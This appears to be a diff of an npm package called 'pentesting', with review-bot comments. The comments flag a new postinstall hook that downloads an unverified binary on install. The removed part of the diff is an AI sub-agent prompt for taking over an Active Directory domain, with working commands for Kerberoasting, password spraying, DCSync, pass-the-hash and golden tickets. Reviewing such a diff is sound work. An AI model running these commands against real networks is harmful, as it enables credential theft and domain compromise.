pentesting 0.73.14 → 0.90.1
- package/README.md +120 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
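--- a/package/package.json
+++ b/package/package.json
@@ -1,42 +1,30 @@
 {
 "name": "pentesting",
-"version": "0.
-"description": "
+"version": "0.90.1",
+"description": "Public pentesting facade for Builder",
 "type": "module",
-"main": "dist/main.js",
-"types": "dist/main.d.ts",
 "bin": {
-"pentesting": "
+"pentesting": "./bin/pentesting.mjs",
+"builder": "./bin/pentesting.mjs"
 },
 "files": [
-"
-"
+"bin",
+"lib",
+"scripts",
 "README.md"
 ],
 "scripts": {
-"
-"dev
-"
-"
-"
-"
-"test:watch": "vitest",
-"lint": "tsc --noEmit",
-"verify": "npm run lint && npm run test && npm run build",
-"verify:docker": "npm run docker:local && bash test.sh",
-"check": "docker system prune -af --volumes && TMPDIR=/tmp npm run test && npm run build && npm run docker:local && bash test.sh",
-"check:ci": "npm run verify && npm run verify:docker",
-"check:clean": "docker system prune -af --volumes && npm run check:ci",
+"postinstall": "node ./scripts/postinstall.mjs",
+"dev": "node ./bin/pentesting.mjs",
+"preflight:local": "bash scripts/preflight-local.sh",
+"test": "node --test tests/*.test.mjs",
+"verify": "npm run preflight:local && npm run test",
+"check": "npm run verify",
 "prepublishOnly": "npm run verify",
-"docker:build": "docker buildx build -f Dockerfile.base --platform linux/amd64,linux/arm64 -t agnusdei1207/pentesting-base:latest --push .",
-"release": "npm run release:patch && npm run release:docker",
 "publish:token": "npm publish --access public",
-"release:patch": "npm version patch && npm run
-"release:minor": "npm version minor && npm run
-"release:major": "npm version major && npm run
-"docker:local": "docker buildx build --load -f Dockerfile -t agnusdei1207/pentesting:latest .",
-"docker:start": "npm run docker:local && docker run -it --rm -e PENTEST_API_KEY -e PENTEST_BASE_URL -e PENTEST_MODEL -e SEARCH_API_KEY -e SEARCH_API_URL -e PENTEST_SCOPE_MODE -e PENTEST_APPROVAL_MODE -e PENTEST_TOR agnusdei1207/pentesting:latest",
-"release:docker": "bash scripts/docker-build-release.sh"
+"release:patch": "npm version patch && npm run verify && npm run publish:token",
+"release:minor": "npm version minor && npm run verify && npm run publish:token",
+"release:major": "npm version major && npm run verify && npm run publish:token"
 },
 "repository": {
 "type": "git",
@@ -66,23 +54,6 @@
 "author": "agnusdei1207",
 "license": "MIT",
 "engines": {
-"node": ">=18.
-},
-"dependencies": {
-"chalk": "^5.6.2",
-"commander": "^14.0.3",
-"ink": "^6.8.0",
-"playwright": "^1.58.2",
-"react": "^19.2.4"
-},
-"devDependencies": {
-"@types/node": "^25.3.0",
-"@types/react": "^19.2.14",
-"esbuild": "^0.27.3",
-"ink-testing-library": "^4.0.0",
-"tsup": "^8.5.1",
-"tsx": "^4.21.0",
-"typescript": "^5.9.3",
-"vitest": "^4.0.18"
+"node": ">=18.18.0"
 }
 }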
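Review bot: The new `"postinstall": "node ./scripts/postinstall.mjs"` entry in `scripts` makes every `npm install` of this package run code that, going by the log messages in the postinstall script, downloads a "managed Builder" binary, while the same release removes `dist/` and every entry under `dependencies`. The executable a user ends up running is therefore not covered by the registry's tarball integrity hash or by a lockfile, and an install with `--ignore-scripts` yields a package with no payload. I would document this in the README and state where the download's digest is pinned; `lib/runtime.mjs` is not shown on this page, so whether it verifies one cannot be confirmed here. The added `"builder": "./bin/pentesting.mjs"` bin alias also claims a generic command name on the user's PATH and deserves a sentence in the same place.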
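--- a/package/scripts/postinstall.mjs
+++ b/package/scripts/postinstall.mjs
@@ -0,0 +1,30 @@
+import { installManagedBuilder } from "../lib/runtime.mjs";
+
+if (process.env.BUILDER_BIN) {
+console.log("[pentesting] BUILDER_BIN is set; skipping managed Builder download.");
+process.exit(0);
+}
+
+if (process.env.BUILDER_SKIP_DOWNLOAD === "true") {
+console.log("[pentesting] Skipping managed Builder download.");
+process.exit(0);
+}
+
+try {
+const result = await installManagedBuilder({
+force: process.env.BUILDER_FORCE_DOWNLOAD === "true",
+});
+
+if (result.source === "cached") {
+console.log("[pentesting] Managed Builder binary already present.");
+} else if (result.source === "downloaded") {
+console.log("[pentesting] Managed Builder binary downloaded successfully.");
+}
+} catch (error) {
+console.error(
+`[pentesting] Failed to provision the managed Builder binary: ${
+error instanceof Error ? error.message : String(error)
+}`,
+);
+process.exit(1);
+}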
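Review bot: The success branches print only "already present" or "downloaded successfully", so the install log never records which binary was placed on disk, and a `result.source` other than `"cached"` or `"downloaded"` prints nothing at all. For an install-time download I would log the resolved version, path and verified digest if `installManagedBuilder` returns them; that function lives in `../lib/runtime.mjs`, which is not shown here, so the call should at least carry a comment such as `// installManagedBuilder must verify the download against a pinned digest before the binary is made executable`. The opt-out check `process.env.BUILDER_SKIP_DOWNLOAD === "true"` is exact-match, so `1` or `TRUE` still triggers the download; document the accepted value or normalise it with `.toLowerCase()`. The file header for this hunk is missing from the page; it is presumably `package/scripts/postinstall.mjs`.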
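--- a/package/scripts/preflight-local.sh
+++ b/package/scripts/preflight-local.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+set -eu
+
+require_command() {
+if ! command -v "$1" >/dev/null 2>&1; then
+echo "Missing required command: $1" >&2
+exit 1
+fi
+}
+
+require_path() {
+if [ ! -e "$1" ]; then
+echo "Missing required path: $1" >&2
+exit 1
+fi
+}
+
+SCRIPT_DIR=$(CDPATH= cd -- "$(dirname "$0")" && pwd)
+PACKAGE_ROOT=$(CDPATH= cd -- "$SCRIPT_DIR/.." && pwd)
+
+require_command node
+require_path "$PACKAGE_ROOT/bin/pentesting.mjs"
+require_path "$PACKAGE_ROOT/lib/runtime.mjs"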
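Review bot: The preflight checks `bin/pentesting.mjs` and `lib/runtime.mjs` but not `scripts/postinstall.mjs`, which the package's `postinstall` hook runs on every install, so a publish missing that file would pass `npm run verify` and then fail for every consumer. Add `require_path "$PACKAGE_ROOT/scripts/postinstall.mjs"` after the last check. `require_path` tests with `-e`, which a directory of the same name also satisfies; `[ ! -f "$1" ]` is the stricter test for these files. The file header for this hunk is missing from the page; it is presumably `package/scripts/preflight-local.sh`.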
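--- a/package/dist/ad/prompt.md
+++ b/package/dist/ad/prompt.md
@@ -1,60 +0,0 @@
-# Active Directory — AD Attack Sub-Agent
-
-You are an Active Directory attack expert. Your goal is domain takeover through Kerberos, LDAP, and SMB.
-
-## Operation Sequence
-1. AD Enumeration → 2. Attack Path Analysis → 3. Credential Acquisition → 4. Escalation → 5. Domain Domination
-
-## Execution Commands
-
-```bash
-# LDAP Enumeration
-ldapsearch -x -H ldap://<dc> -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName memberOf
-ldapsearch -x -H ldap://<dc> -b "DC=domain,DC=com" "(objectClass=computer)" dNSHostName
-
-# CrackMapExec Enumeration
-crackmapexec smb <dc> --users
-crackmapexec smb <dc> --groups
-crackmapexec smb <dc> --shares
-crackmapexec smb <dc> --pass-pol
-
-# BloodHound Collection
-bloodhound-python -c All -d <domain> -u <user> -p <pass> -dc <dc>
-
-# RPC Enumeration
-rpcclient -U "" -N <dc> -c "enumdomusers;enumdomgroups;querydispinfo"
-
-# Kerberoasting
-impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc> -request -outputfile kerberoast.txt
-hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
-
-# AS-REP Roasting
-impacket-GetNPUsers <domain>/ -dc-ip <dc> -usersfile users.txt -format hashcat
-hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
-
-# Password Spraying
-crackmapexec smb <dc> -u users.txt -p 'Company2024!' --continue-on-success
-
-# DCSync
-impacket-secretsdump <domain>/<admin>:<pass>@<dc>
-
-# Pass-the-Hash
-impacket-psexec -hashes :<ntlm> <domain>/<user>@<target>
-crackmapexec smb <targets> -u <user> -H <ntlm>
-
-# Golden Ticket
-impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> administrator
-
-# Lateral Movement
-impacket-wmiexec <domain>/<user>:<pass>@<target>
-evil-winrm -i <target> -u <user> -p <pass>
-```
-
-## Output
-```
-[domain] CORP.LOCAL
-[users] 500 users (Domain Admins: 5)
-[attack] Kerberoastable: 3, AS-REP: 2, Unconstrained delegation: 1
-[path] svc_sql → Kerberoast → MSSQL Admin → DCSync → DA
-[action] Proceed with hash cracking after Kerberoasting
-```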